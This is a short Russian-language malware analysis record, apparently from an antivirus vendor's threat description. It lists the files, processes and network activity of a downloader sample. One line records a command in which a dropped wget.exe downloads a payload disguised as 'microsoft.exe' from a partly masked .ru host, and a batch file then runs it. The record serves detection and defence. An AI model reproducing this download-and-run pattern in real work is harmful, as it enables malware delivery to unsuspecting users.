Техническая информация
- %TEMP%\microsoft.exe (загружен из сети Интернет)
- %TEMP%\1.tmp\wget.exe http://e.####.##-0372657165400983.ru/microsoft.exe -O %TEMP%\microsoft.exe
- <SYSTEM32>\cmd.exe /c ""%TEMP%\1.tmp\main.bat" "
- %TEMP%\microsoft.exe
- %TEMP%\1.tmp\wget.exe
- %TEMP%\1.tmp\main.bat
- %TEMP%\1.tmp\main.bat
- %TEMP%\microsoft.exe
- 'e.####.##-0372657165400983.ru':80
- e.####.##-0372657165400983.ru/microsoft.exe
- DNS ASK e.####.##-0372657165400983.ru
- '<IP-адрес в локальной сети>':1035